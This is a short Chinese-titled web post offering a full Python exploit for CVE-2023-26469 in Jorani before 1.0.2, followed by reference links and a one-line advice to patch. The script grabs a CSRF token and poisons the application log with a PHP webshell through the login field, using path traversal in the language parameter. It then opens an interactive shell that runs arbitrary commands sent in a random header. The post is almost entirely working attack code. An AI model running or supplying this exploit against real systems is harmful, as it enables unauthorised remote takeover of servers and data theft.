CVE-2023-26469 RCE漏洞（附EXP）

Jorani < 1.0.2

"""vulnerability covered by CVE-2023-26469"""import readlineimport requestsimport datetimeimport sysimport reimport base64import randomimport stringrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)msg = lambda x,y="n":print(f'x1b[92m[+]x1b[0m {x}', end=y)err = lambda x,y="n":print(f'x1b[91m[x]x1b[0m {x}', end=y)log = lambda x,y="n":print(f'x1b[93m[?]x1b[0m {x}', end=y)CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')CMD_PATTERN = re.compile('---------(.*?)---------', re.S)URLS = {  'login' : '/session/login',  'view'  : '/pages/view/',}alphabet = string.ascii_uppercaseHEADER_NAME = ''.join(random.choice(alphabet) for i in range(12))BypassRedirect = {  'X-REQUESTED-WITH'  : 'XMLHttpRequest',  HEADER_NAME    : ""}INPUT = "x1b[92mjrjgjkx1b[0m@x1b[41mjoranix1b[0m(PSEUDO-TERM)n$ " # The input used for the pseudo termu = lambda x,y: x + URLS[y]POISON_PAYLOAD    = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>"PATH_TRAV_PAYLOAD  = "../../application/logs"if __name__ == '__main__':  print("""  /!\ Do not use this if you are not authorized to /!\    """)  log("POC made by @jrjgjk (Guilhem RIOUX)", "nn")  if(len(sys.argv) == 1):    err(f"Usage: {sys.argv[0]} <url>")    exit(0)  log(f"Header used for exploit: {HEADER_NAME}")    t = sys.argv[1]  s = requests.Session()  log("Requesting session cookie")  res = s.get(u(t,"login"), verify = False)  C = s.cookies.get_dict()  Date = datetime.date.today()  log_file_name = f"log-{Date.year}-{str(Date.month).zfill(2)}-{str(Date.day).zfill(2)}"  csrf_token = re.findall(CSRF_PATTERN, res.text)[0]   log(f"Poisonning log file with payload: '{POISON_PAYLOAD}'")  log(f"Set path traversal to '{PATH_TRAV_PAYLOAD}'")  msg(f"Recoveredd CSRF Token: {csrf_token}")  data = {    "csrf_test_jorani"  : csrf_token,    "last_page"      : "session/login",    "language"      : PATH_TRAV_PAYLOAD,    "login"        : POISON_PAYLOAD,    "CipheredValue"    : "DummyPassword"  }  s.post(u(t,"login"), data=data)  log(f"Accessing log file: {log_file_name}")  exp_page = t + URLS['view'] + log_file_name  ### Shell  cmd = ""  while True:    cmd = input(INPUT)    if(cmd in ['x', 'exit', 'quit']):      break    elif(cmd == ""):      continue    else:      BypassRedirect[HEADER_NAME] = base64.b64encode(b"echo ---------;" + cmd.encode() + b" 2>&1;echo ---------;")      res = s.get(exp_page, headers=BypassRedirect)      cmdRes = re.findall(CMD_PATTERN, res.text)      try:        print(cmdRes[0])      except:        print(res.text)        err("Wow, there was a problem, are you sure of the URL ??")        err('exiting..')        exit(0)

https://src.uniontech.com/index.php?c=ti&a=view&advince_id=UTSA-2023-001595https://mp.weixin.qq.com/s/A4YP1wpdRv0QgXT-qHViLwhttps://nvd.nist.gov/vuln/detail/CVE-2023-24626

建议及时更新补丁！